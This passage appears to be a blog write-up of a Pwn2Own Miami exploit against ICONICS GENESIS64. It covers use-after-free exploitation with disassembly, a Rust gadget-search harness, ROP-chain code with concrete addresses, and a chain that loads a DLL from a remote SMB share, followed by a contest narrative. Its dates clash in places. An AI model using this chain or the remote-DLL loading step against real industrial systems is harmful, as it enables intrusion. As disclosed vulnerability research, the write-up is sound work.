exactly fits the bill: it allows for an allocation of an arbitrary size and lets the client fully control its content which is perfect ๐๐ฝ. The function that deserializes this message allocates and fills up an array of arbitrary size made of 32-bit integers, and this is what it looks like:
void __fastcall PayloadReq7D0_t::ReadFromArchive(PayloadReq7D0_t *Payload, Archive_t *Archive) {
// ...
if ( (Archive->m_nMode & ArchiveReadMode) != 0 )
{
Archive::ReadString((CArchive *)Archive, (CString *)Payload);
Archive::ReadString((CArchive *)Archive, (CString *)&Payload->ProgId);
Archive::ReadString((CArchive *)Archive, (CString *)&Payload->StringC);
Archive::ReadUint32_(Archive, &Payload->qword18);
Archive::ReadUint32_(Archive, &Payload->BufferSize);
BufferSize = Payload->BufferSize;
if ( BufferSize )
{
Buffer = calloc(BufferSize, 4ui64);
Payload->Buffer = Buffer;
if ( Buffer )
{
for ( i = 0i64; (unsigned int)i < Payload->BufferSize; Archive->m_lpBufCur += 4 )
{
Entry = &Payload->Buffer[i];
// ...
*Entry = *(_DWORD *)m_lpBufCur;
}
// ...
Hijacking control flow & ROPing to get arbitrary native code execution
Once I identified the right memory primitives, then hijacking control flow was pretty straightforward. As I mentioned above, VariantClear
reads the first 8 bytes of the object as a virtual table. Then, it reads off this virtual table at a specific offset and dispatches an indirect call. This is the assembly code with @rcx
pointing to the variant that we reclaimed and filled with arbitrary content:
0:011> u . l3
OLEAUT32!VariantClear+0x20b:
00007ffb'0df751cb mov rax,qword ptr [rcx]
00007ffb'0df751ce mov rax,qword ptr [rax+10h]
00007ffb`0df751d2 call qword ptr [00007ffb`0df82660]
0:011> u poi(00007ffb`0df82660)
OLEAUT32!SetErrorInfo+0xec0:
00007ffb`0deffd40 jmp rax
The first instruction reads the virtual table address into @rax
, then the Release
virtual method address is read at offset 0x10
from the table, and finally, Release
is called via an indirect call. Imagine that the below is the content of the reclaimed variant object:
0x11111111'11111111
0x22222222'22222222
0x33333333'33333333
Execution will be redirected to [[0x11111111'11111111] + 0x10]
which means:
0x11111111'11111111
needs to be an address that points somewhere readable in the address space to not crash,- At the same time, it needs to be pointing to another address (to which is added the offset
0x10
) that will point to where we want to pivot execution.
I was like, ugh, this constrained call
primitive is a bit annoying ๐. Another crucial piece that we haven't brought up yet is... ASLR. But fortunately for us, the main module GenBroker64.exe
isn't randomized but the rest of the address space is. Technically this is false because GenClient64.dll
wasn't randomized either but I quickly ditched it as it was tiny and uninteresting. The only option for us is to use gadgets from GenBroker64.exe
only because we do not have a way to leak information about the target's address space. On top of that, the used-after-free object is 0xc0
bytes long which didn't give us a lot of room for a ROP chain (at best 0xc0 / 8 = 24
slots).
All those constraints felt underwhelming at first, so I decided to address them one by one. What do we need from our ROP chain? The ROP chain needs to demonstrate arbitrary code execution, which is commonly done by popping a shell. Because of ASLR, we don't know where CreateProcess or similar are in memory. We are stuck to reusing functions imported by GenBroker64.exe
. This is possible because we know where its Import Address Table is, and we know API addresses are populated in this table by the PE loader when the process is created. Unfortunately, GenBroker64.exe
doesn't import anything super exciting:

The only obvious import that stands out was LoadLibraryExW. It allows loading a DLL hosted on a remote share. This is cool, but it also means we need to burn space in the reclaimed heap chunk just to store a UTF-16 string that looks like the following: \\192.168.1.1\x\a.dll\x00
. This is already ~44 bytes ๐.
How the hell do we boost the constrained call primitive into an arbitrary call primitive ๐ค? Based on the constraints, looking for that magic gadget was painful and a bit of a walk in the desert. I started doing it manually and focusing on virtual tables because in essence.. we need a very specific one. On top of being well formed, the function pointer at offset 0x10
needs to be pointing to a piece of code that is useful for us. After hours and hours of prototyping, searching, and trying ideas, I lost hope. It was so weird because it felt like I was so close but so far away at the same time ๐ข.
I switched gears and decided to write a brute-force tool. The idea was to capture a crash dump when I hijack control flow and replace the virtual address table pointer with EVERY addressable part of GenBroker64.exe
. The emulator executes forward and catches crashes. When one occurs, I can check postconditions such as 'Does RIP have a value that looks like a controlled value'? I initially wrote this as a quick & dirty script but recently rewrote it in Rust as a learning exercise ๐ฆ. I'll try to clean it up and release it if people are interested. The precondition function is used to insert the candidate address right where the vtable is expected to be at to simulate our exploit. The pre
function runs before the emulator starts executing:
impl Finder for Pwn2OwnMiami2022_1 {
fn pre(&mut self, emu: &mut Emu, candidate: u64) -> Result<()> {
// ```
// (1574.be0): Access violation - code c0000005 (first/second chance not available)
// For analysis of this file, run !analyze -v
// oleaut32!VariantClearWorker+0xff:
// 00007ffb`3a3dc7fb 488b4010 mov rax,qword ptr [rax+10h] ds:deadbeef`baadc0ee=????????????????
//
// 0:011> u . l3
// oleaut32!VariantClearWorker+0xff:
// 00007ffb`3a3dc7fb 488b4010 mov rax,qword ptr [rax+10h]
// 00007ffb`3a3dc7ff ff15c3ce0000 call qword ptr [oleaut32!_guard_dispatch_icall_fptr (00007ffb`3a3e96c8)]
//
// 0:011> u poi(00007ffb`3a3e96c8)
// oleaut32!guard_dispatch_icall_nop:
// 00007ffb`3a36e280 ffe0 jmp rax
// ```
let rcx = emu.rcx();
// Rewind to the instruction right before the crash:
// ```
// 0:011> ub .
// oleaut32!VariantClearWorker+0xe6:
// ...
//00007ffb'3a3dc7f8 488b01 mov rax,qword ptr [rcx]
// ```
emu.set_rip(0x00007ffb_3a3dc7f8);
// Overwrite the buffer we control with the `MARKER_PAGE_ADDR`. The first qword
// is used to hijack control flow, so this is where we write the candidate
// address.
for qword in 0..18 {
let idx = qword * std::mem::size_of::<u64>();
let idx = idx as u64;
let value = if qword == 0 {
candidate
} else {
MARKER_PAGE_ADDR.u64()
};
emu.virt_write(Gva::new(rcx + idx), &value)?;
}
Ok(())
}
fn post(&mut self, emu: &Emu) -> Result<bool> {
// ...
}
}
The post
function runs after the emulator halted (because of a crash or a timeout). The below tries to identify a tainted RIP:
impl Finder for Pwn2OwnMiami2022_1 {
fn pre(&mut self, emu: &mut Emu, candidate: u64) -> Result<()> {
// ...
}
fn post(&mut self, emu: &Emu) -> Result<bool> {
// What we want here, is to find a sequence of instructions that leads to @rip
// being controlled. To do that, in the |Pre| callback, we populate the buffer
// we control with the `MARKER_PAGE_ADDR`, which is a magic address
// that'll trigger a fault if it's accessed/written to / executed. Basically,
// we want to force a crash as this might mean that we successfully found a
// gadget that'll allow us to turn the constrained arbitrary call from above,
// to an uncontrolled where we don't need to worry about dereferences (cf |mov
// rax, qword ptr [rax+10h]|).
//
// Here is the gadget I ended up using:
// ```
// 0:011> u poi(1400aed18)
// 00007ffb2137ffe0 sub rsp,38h
// 00007ffb2137ffe4 test rcx,rcx
// 00007ffb2137ffe7 je 00007ffb`21380015
// 00007ffb2137ffe9 cmp qword ptr [rcx+10h],0
// 00007ffb2137ffee jne 00007ffb`2137fff4
// ...
// 00007ffb2137fff4 and qword ptr [rsp+40h],0
// 00007ffb2137fffa mov rax,qword ptr [rcx+10h]
// 00007ffb2137fffe call qword ptr [mfc140u!__guard_dispatch_icall_fptr (00007ffb`21415b60)]
// ```
let mask = 0xffffffff_ffff0000u64;
let marker = MARKER_PAGE_ADDR.u64();
let rip_has_marker = (emu.rip() & mask) == (marker & mask);
Ok(rip_has_marker)
}
}
I went for lunch to take a break and let the bruteforce run while I was out. I came back and started to see exciting results ๐ฎ:

Although it took multiple iterations to tighten the postconditions to eliminate false positives, I eventually found glorious 0x1400aed08
. Let's run through what glorious 0x1400aed08
does. Small reminder, this is the code we hijack control-flow from:
00007ffb'0df751cb mov rax,qword ptr [rcx]
00007ffb'0df751ce mov rax,qword ptr [rax+10h]
00007ffb`0df751d2 call qword ptr [00007ffb`0df82660] ; points to jump @rax
Okay, the first instruction reads the first QWORD in the heap chunk which we'll set to 0x1400aed08
. The second instruction reads the QWORD at 0x1400aed08+0x10
, which points to a function in mfc140u!CRuntimeClass::CreateObject
:
0:011> dqs 0x1400aed08+10
00000001`400aed18 00007ffb`2137ffe0 mfc140u!CRuntimeClass::CreateObject [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\objcore.cpp @ 127]
Execution is transferred to 0x7ffb2137ffe0
/ mfc140u!CRuntimeClass::CreateObject
, which does the following:
0:011> u 00007ffb2137ffe0
00007ffb2137ffe0 sub rsp,38h
00007ffb2137ffe4 test rcx,rcx
00007ffb2137ffe7 je 00007ffb'21380015 ; @rcx is never going to be zero, so we won't take this jump
00007ffb2137ffe9 cmp qword ptr [rcx+10h],0 ; @rcx+0x10 is populated with data from our future ROP chain
00007ffb2137ffee jne 00007ffb'2137fff4 ; so it will never be zero meaning we'll take this jump always
...
00007ffb2137fff4 and qword ptr [rsp+40h],0
00007ffb2137fffa mov rax,qword ptr [rcx+10h]
00007ffb2137fffe call qword ptr [mfc140u!__guard_dispatch_icall_fptr (00007ffb`21415b60)]
0:011> u poi(00007ffb`21415b60)
mfc140u!_guard_dispatch_icall_nop [D:\a01\_work\6\s\src\vctools\crt\vcstartup\src\misc\amd64\guard_dispatch.asm @ 53]:
00007ffb`21407190 ffe0 jmp rax
Okay, so this is .. amazing โ๐ฝ. It reads at offset 0x10
off our chunk, and assuming it isn't zero it will redirect execution there. If we set-up the reclaimed chunk to have the first QWORD be 0x1400aed08
, and the one at offset 0x10
to 0xdeadbeefbaadc0de
, then execution is redirected to 0xdeadbeefbaadc0de
. This precisely boosts the constrained call primitive into an arbitrary call primitive. This is solid progress, and it filled me with hope.
With an arbitrary call primitive in hands, we need to find a way to kick-start a ROP chain. Usually, the easiest way to do that is to pivot the stack to an area you control. Chaining the gadgets is as easy as returning to the next one in line. Unfortunately, finding this pivot was also pretty annoying. GenBroker64.exe
is fairly small in size and doesn't offer many super valuable gadgets. Another wall.
I decided to try to find the pivot gadget with my tool. Like in the previous example, I injected the candidate address at the right place, looked for a stack pivoted inside the heap chunk we have control over, and a tainted RIP:
impl Finder for Pwn2OwnMiami2022_2 {
fn pre(&mut self, emu: &mut Emu, candidate: u64) -> Result<()> {
// Here, we continue where we left off after the gadget found in |miami1|,
// where we went from constrained arbitrary call, to unconstrained arbitrary
// call. At this point, we want to pivot the stack to our heap chunk.
//
// ```
// (1de8.1f6c): Access violation - code c0000005 (first/second chance not available)
// For analysis of this file, run !analyze -v
// mfc140u!_guard_dispatch_icall_nop:
// 00007ffd`57427190 ffe0 jmp rax {deadbeef`baadc0de}
//
// 0:011> dqs @rcx
// 00000000`1970bf00 00000001`400aed08 GenBroker64+0xaed08
// 00000000`1970bf08 bbbbbbbb`bbbbbbbb
// 00000000`1970bf10 deadbeef`baadc0de <-- this is where @rax comes from
// 00000000`1970bf18 61616161`61616161
// ```
self.rcx_before = emu.rcx();
// Fix up @rax with the candidate's address.
emu.set_rax(candidate);
// Fix up the buffer, where the address of the candidate would be if we were
// executing it after |miami1|.
let size_of_u64 = std::mem::size_of::<u64>() as u64;
let second_qword = size_of_u64 * 2;
emu.virt_write(Gva::from(self.rcx_before + second_qword), &candidate)?;
// Overwrite the buffer we control with the `MARKER_PAGE_ADDR`. Skip the first 3
// qwords, because the first and third ones are already used to hijack flow
// and the second we skip it as it makes things easier.
for qword_idx in 3..18 {
let byte_idx = qword_idx * size_of_u64;
emu.virt_write(
Gva::from(self.rcx_before + byte_idx),
&MARKER_PAGE_ADDR.u64(),
)?;
}
Ok(())
}
fn post(&mut self, emu: &Emu) -> Result<bool> {
//Let's check if we pivoted into our buffer AND that we also are able to
// start a ROP chain.
let wanted_landing_start = self.rcx_before + 0x18;
let wanted_landing_end = self.rcx_before + 0x90;
let pivoted = has_stack_pivoted_in_range(emu, wanted_landing_start..=wanted_landing_end);
let mask = 0xffffffff_ffff0000;
let rip = emu.rip();
let rip_has_marker = (rip & mask) == (MARKER_PAGE_ADDR.u64() & mask);
let is_interesting = pivoted && rip_has_marker;
Ok(is_interesting)
}
}
After running it for a while, 0x14005bd25
appeared:

Let's run through what happens when execution is redirected to 0x14005bd25
:
0:011> u 0x14005bd25 l3
GenBroker64+0x5bd25:
00000001`4005bd25 8be1 mov esp,ecx
00000001`4005bd27 803d5a2a0a0000 cmp byte ptr [GenBroker64+0xfe788 (00000001`400fe788)],0
00000001`4005bd2e 0f8488010000 je GenBroker64+0x5bebc (00000001`4005bebc)
0:011> db 00000001`400fe788 l1
00000001`400fe788 00 .
0:011> u 00000001`4005bebc l0n11
GenBroker64+0x5bebc:
00000001`4005bebc 4c8d5c2460 lea r11,[rsp+60h]
00000001'4005bec1 498b5b30 mov rbx,qword ptr [r11+30h]
00000001'4005bec5 498b6b38 mov rbp,qword ptr [r11+38h]
00000001'4005bec9 498b7340 mov rsi,qword ptr [r11+40h]
00000001'4005becd 498be3 mov rsp,r11
00000001`4005bed0 415f pop r15
00000001`4005bed2 415e pop r14
00000001`4005bed4 415d pop r13
00000001`4005bed6 415c pop r12
00000001'4005bed8 5f pop rdi
00000001`4005bed9 c3 ret
This one is interesting. The first instruction effectively pivots the stack to the heap chunk under our control. What is weird about it is that it uses the 32-bit registers esp
& ecx
and not rsp
& rcx
. If either the stack or our heap buffer addresses were to be allocated inside a region above 0xffff'ffff
, things would go wrong (because of truncation).
0:011> r @rsp
rsp=000000001961acd8
0:011> r @rcx
rcx=000000001970bf00
There's no way both of those addresses are always allocated under 0xffff'ffff
I thought. I must have gotten lucky when I captured the crash-dump. But after running it multiple times it seemed like both the heap and the stack addresses fit into a 32-bit register. This was unexpected, and I don't know why the kernel always seems to lay out those regions in the lower part of the virtual address space. Regardless, I was happy about it ๐
After pivoting the stack, it reads three values into @rbx
, @rbp
& @rsi
at different offsets from @r11
. @r11
is pointing to @rsp+0x60
which is at offset 0x60
from the heap chunk start. This is fine because we have control over 0xc0
bytes which makes the offsets 0x90
/ 0x98
/ 0xa0
inbound. After that, the stack is pivoted again a little further via the mov rsp, r11
instruction, which moves it 0x60
bytes forward. From there, five pointers are popped off the stack, giving us control over @r15
/ @r14
/ @r13
/ @r12
/ @rdi
.
What's next now ๐ค? We made a lot of progress but what we've been doing until now is just setting things up to do useful things. The puzzle pieces are yet to be arranged to call LoadLibraryExW(L"\\\\192.168.0.1\\x\\a.dll\x00", 0, 0)
. The target is a 64-bit process, so we need to load @rcx
with a pointer to the string. Both @rdx
& @r8
need to be set to zero. To call LoadLibraryExW
, we need to dereference the IAT chunk at 0x1400ae418
, and redirect execution there:
0:011> dqs 0x1400ae418 l1
00000001`400ae418 00007ffd`7028e4f0 kernel32!LoadLibraryWStub
We will put the string in the heap chunk so we just need to find a way to load its address in @rcx
. @rcx
points to the start of our heap chunk, so we need to add an offset to it. I did this with an add ecx, dword [rbp-0x75]
gadget. I load @rbp
with an address that points to the value I need to align @ecx
with. Depending on where our heap chunk is allocated, the add ecx
could trigger similar problems than the stack pivot but testing showed that the address always landed in the lower 4GB of the address space making it safe.
# Set @rbp to an address that points to the value 0x30. This is used
# to adjust the @rcx pointer to the remote dll path from above.
# 0x1400022dc: pop rbp ; ret ; (717 found)
pop_rbp_gadget_addr = 0x1400022DC
# > rp-win-x64.exe --file GenBroker64.exe --search-hexa=\x30\x00\x00\x00
# 0x1400a2223: 0\x00\x00\x00
_0x30_ptr_addr = 0x1400A2223
p += p64(pop_rbp_gadget_addr)
p += p64(_0x30_ptr_addr + 0x75)
left -= 8 * 2
# Adjust the @rcx pointer to point to the remote dll path using the
# 0x30 pointer loaded in @rbp from above.
# 0x14000e898: add ecx, dword [rbp-0x75] ; ret ; (1 found)
add_ecx_gadget_addr = 0x14000E898
p += p64(add_ecx_gadget_addr)
left -= 8
It is convenient to have the stack pivoted into a heap chunk under our control but it is dangerous to call LoadLibraryExW
in that state. It will corrupt neighboring chunks, risk accessing unmapped memory, etc. It's bad. Very bad. We don't necessarily need to pivot back the stack where it was before, but we need to pivot it into a reasonably large region of memory in which content stays the same, or at least not often. After several tests, pivoting to GenClient64
's data section seemed to work well:
0:011> !dh -a genclient64
SECTION HEADER #3
.data name
6C80 virtual size
12B000 virtual address
C0000040 flags
Read Write
I reused the pop rbp
gadget, used a leave; call qword [@r14+0x08]
gadget to both pivot the stack, and redirect execution to LoadLibraryExW
. It isn't reflected well in this article but finding this gadget was also annoying. The challenge was to be able to pivot the stack and call LoadLibraryExW
at the same time. I have no control over GenClient64
's data section which means I lose control of the execution flow if I only pivot there. On top of that, I was tight on available space.

Phew, we did it ๐ฎ. Putting this ROP chain together was a struggle and was nerve-wracking. But you know, making constant small incremental progress led us to the summit. There were other challenges I ran into that I didn't describe in this article though. One of them was that I first tried to deliver the payload via a WebDav share instead of SMB. I can't remember the reason, but what would happen is that the first time the link was fed to LoadLibraryExW
, it would fail, but the second time the payload would pop. I spent time reverse-engineering mrxdav.sys
to understand what was different the first from the second time the load request was sent, but I can't remember why. Yeah, I know, super helpful ๐ฌ. Also another essential property of this vulnerability is that losing the race doesn't lead to a crash. This means the exploit can try as many times as we want.
After weeks of grinding against this target after work, I finally had something that could be demonstrated during the contest. What a crazy ride ๐ข.
๐ Entering the contest
At this point in the journey, it is probably the end of November / or mid-December 2022. The contest is happening at the end of January, so timeline-wise, it is looking great. There's time to test the exploit, tweak it to maximize the chances of landing successfully, and develop a payload for style points at the contest and have some fun. I am feeling good and was preparing for a vacation trip to France to see my family and take a break.
I'm not sure exactly when this happened, but COVID-19 pushed the competition back to the 19th / 21st of April 2023. This was a bummer as I worked hard to be on time ๐ฉ. I was disappointed, but it wasn't the worst thing to happen. I could relax a bit more and hope this extra time wouldn't allow the vendor to find and fix the vulnerability I planned to exploit. This part was a bit nerve-wracking as I didn't know any of the vendors; so I wasn't sure if this was something likely to happen or not.
Testing the exploit wasn't the most fun activity, but I was determined to do all the due diligence from my side as I wanted to maximize my chances to win. I knew the target software would run in a VMWare virtual machine, so I downloaded it, and set one up. It felt silly as I had done my tests in a Hyper-V VM, and I didn't expect that a different hypervisor would change anything. Whatever. I get amazed every day at how complex and tricky to predict computers are, so I knew it might be useful.
The VM was ready, I threw the exploit at it, excited as always, and... nothing. That was unexpected, but it wasn't 100% reliable either, so I ran it more times. But nothing. Wow, what the heck ๐ฌ? It felt pretty uncomfortable, and my brain started to run far with impostor syndrome. I asked myself "Did you actually find a real vulnerability?" or "Had you set up the target with a non-default configuration?". Looking back on it, it is pretty funny, but oh boy, I wasn't laughing at the time.
I installed my debugging tools inside the target and threw the exploit on the operating table. I verified that I was triggering the memory corruption, and that my ROP chain was actually getting executed. What a relief. Maybe I do understand computers a little bit, I thought ๐ณ.
Stepping through the ROP chain, it was clear that LoadLibraryExW
was getting executed, and that it was reaching out to my SMB server. It didn't seem to ask to be served with the DLL I wanted it to load though. Googling the error code around, I realized something that I didn't know, and could be a deal breaker. Windows 10, by default, prevents the default SMB client library from connecting anonymously to SMB share ๐ฎ Basically, the vector that I was using to deliver the final payload was blocked on the latest version of Windows. Wow, I didn't see this coming, and I felt pretty grateful to set up a new environment to run into this case.
What was stressing me out, though, was that I needed to find another way to deliver the payload. I didn't see other quick ways to do that because of ASLR, and the imports of GenBroker64.exe
. I had potential ideas, but they would have required me to be able to store a much larger ROP chain. But I didn't have that space. What was bizarre, though, was the fact that my other VM was also Windows 10, and it was working fine. It could have been possible that it wasn't quite the latest Windows 10 or that somehow I had turned it back on while installing some tool ๐ค.
I eventually landed on this page, I believe: Guest access in SMB2 and SMB3 disabled by default in Windows. According to it, Windows 10 Enterprise edition turns it off by default, but Windows 10 Pro edition doesn't. So supposedly everything would be back working if I installed a Windows 10 Pro edition..? I reimaged my VM with a Professional version, and this time, the exploit worked as expected; phew ๐ I dodged a bullet on this one. I really didn't want to throw away all the work I had done with the ROP chain, and I wasn't motivated to find, and assemble new puzzle pieces.
I was finally.... ready. I was extremely nervous but also super excited. I worked hard on that project; it was time to collect some dividends and have fun.
I didn't want to burn too many vacation days, so I caught a red-eye flight from Seattle to Miami International Airport on the first day of the competition.

I landed at 7AM ish, grabbed a taxi from the airport and headed to my hotel in Miami Beach, close to The Fillmore Miami Beach (the venue).

I watched the draw online and was scheduled to go on the first day of the contest, on April 14th, at 2 p.m. local time. I worked the morning and took my afternoon off to attend the competition.

I showed up at the conference venue but didn't see any Pwn2Own posters or anything. Security guards were checking the attendees' badges, so I couldn't get in. I looked around the building for another entrance and checked my phone to see if I had missed something, but nothing. I returned to the main entrance to ask the security guards if they knew where Pwn2Own was happening. This was hilarious because they had no clue what this was. I asked "Do you know where the Pwn2Own competition is happening?", the guy answered "Hmm no I never heard about this. Let me ask my colleague" and started talking to his buddy through the earpiece. "Yo mitch, do you know anything about a ... own to pown, or an own to own competition..?". Boy, I was standing there, laughing hard inside ๐. After a few exchanges, they decided to grab somebody from the organization, and that person let me in and made me a badge: Pown 2Own. Epic ๐๐ฝ

I entered the competition area, a medium-sized room with a few tables, the stage, and people hanging out. It was reasonably dark, and the light gave it a nice hacker ambiance. I hung out in the room, observing what people were up to. Journalists coming in and out, competitors discussing the schedule, etc.
The clock was ticking, and my turn was coming up pretty fast. I was worried that I wouldn't have time to set up and verify the configuration of the official target. I tried to make my presence known to the organizers, but I don't think they noticed. About 15 minutes before my turn, one of the organizers found me, and we went on the stage to set things up. I pulled out my laptop, plugged an ethernet cable that connected me to the target laptop, and configured a static IP. I chose the same IP I used during my testing to ensure I didn't have a larger IP address, which would require a larger string and potentially run out of space on my ROP chain ๐ซข. I tried pinging the target IP, but it wasn't answering. I began to check if my firewall was on or if I had mistyped something but nothing worked. At this point, we decided to switch the ethernet cable as it was probably the problem. The clock was ticking, and we were about 5 minutes from show time but nothing was working yet.
I was getting nervous as I wanted to verify a few things on the target laptop to ensure it was properly configured. I ran through my checklist while somebody was looking for a new ethernet cable. I checked the remote software version, the target IP, that GenBroker64.exe
was an x64 binary. One of the organizers handed me a cable, so I hooked it up. The Pwn2Own host started to go live and I could hear him introducing my entry. After a few seconds, he comes over and asks if we're ready.. to which I answer nervously yes, when in fact, I wasn't ready ๐คฃ. I had two minutes left to verify connectivity with the target and make sure the target could browse an SMB share I opened to ensure my payload would deliver just fine. The target could browse my share, and I was finally able to ping the target right on time to go live.
I felt stressed out and had a hard time typing the command line to invoke my exploit. I was worried I would mistype the IP address or something silly like that. I pressed enter to launch it... and immediately saw the calculator popping as well as the background wallpaper changed. I was stunned ๐ฑ. I just could not believe that it landed. To this day, I am still shocked that it worked out. I couldn't believe it; I am not even sure I cracked a smile ๐ . People clapped, I closed my laptop and stood up, feeling the adrenaline rush through my legs. Powerful.
I followed one of the event organizers to the disclosure room, where ZDI verified that the vulnerability wasn't known to them. They looked on their laptop for a minute or two and said that they didn't know about it. Awesome. The second stage happens with the vendor. An employee of ICONICS entered the room, and I described to them the vulnerability and the exploit at a high level. They also said they didn't know about this bug, so I had officially won ๐ฅ๐.
I handshaked the organizers and returned to my hotel with a big ass smile on my face. I actually couldn't stop smiling like a dummy. I dropped my laptop there and decided to take the day after off to reward myself. I returned to the venue and hung out in the room to attend the other entries for the day. This is where I eventually ran into Steven Seeley and Chris Anastasio. Those guys were planning to demonstrate 5 different exploits which seemed insane to me ๐ณ. It put things into perspective and made me feel like I had a lot to learn which was exciting. On top of killing it at the competition, they were also extremely friendly and let me know that they were setting up a dinner with other participants. I was definitely game to join them and meet up with folks.
We met at a restaurant in Miami Beach and I met the Flashback team (Pedro & Radek), Sharon & Uri from the Claroty Research team, and Daan & Thijs from Computest Sector7. Honestly, it felt amazing to meet fellow researchers and learn from them. It was super interesting to hear people's backgrounds, how they approached the competition, and how they looked for bugs.

I spent the next two days hanging out, cheering for the competitors in the Pwn2Own room, grabbing celebratory drinks, and having a good time. Oh and of course, I grabbed oversized Pwn2Own Miami swag shirts ๐ Steven & Chris owned so many targets with a first-blood that they won many laptops. Out of kindness, they offered me one as a present, which I was super grateful for and has been a great memento memory for me; so a big thank you to them.

I packed my bag, grabbed a taxi, headed to the airport, and flew back home with lifelong memories ๐
โ Wrapping up
In this post I tried to walk you through the ups and downs of vulnerability research ๐ข I want to thank the ZDI folks for both organizing such a fun competition and rooting for participants ๐. Also, special thanks to all the contestants for being inspiring, and their kindness ๐.
I think there are some good lessons that I learned that might be useful for some of you out there:
- Don't under-estimate what tooling can do when aimed at the right things. I initially didn't want to use fuzzing as I was interested in code-review only. In the end, my quick fuzzing campaign highlighted something that I missed and that area ended up being juicy.
- Focus on understanding the target. In the end, it facilitates both bug finding and exploitation.
- Try to focus on solving problems one by one. Trying to visualize all the steps you have to go through to make something work can feel overwhelming. Ironically, for me it usually leads to analysis paralysis which completely halts progress.
- Somehow attack surface enumeration isn't super fun to me. I always regret not spending enough time doing it.
- Testing isn't fun but it is worth being thorough when the stakes are high. It would have been heartbreaking for my entry to fail for an issue that I could have caught by doing proper testing.
If you want to take a look, the code of my exploit is available on Github: Paracosme. If you are interested in reading other write-ups from Pwn2Own Miami 2022, here is a list:
- Pwn2Own Miami 2022: Unified Automation C++ Demo Server DoS
- Pwn2Own Miami 2022: OPC UA .NET Standard Trusted Application Check Bypass
- Pwn2Own Miami 2022: Inductive Automation Ignition Remote Code Execution
- Pwn2Own Miami 2022: AVEVA Edge Arbitrary Code Execution
- Pwn2Own Miami 2022: ICONICS GENESIS64 Arbitrary Code Execution
- Two lines of Jscript for $20,000
Special thank you to my boiz yrp604 and __x86 for proofreading this article ๐.
Last but not least, come hangout on Diary of reverse-engineering's Discord server with us ๐๐ฝ!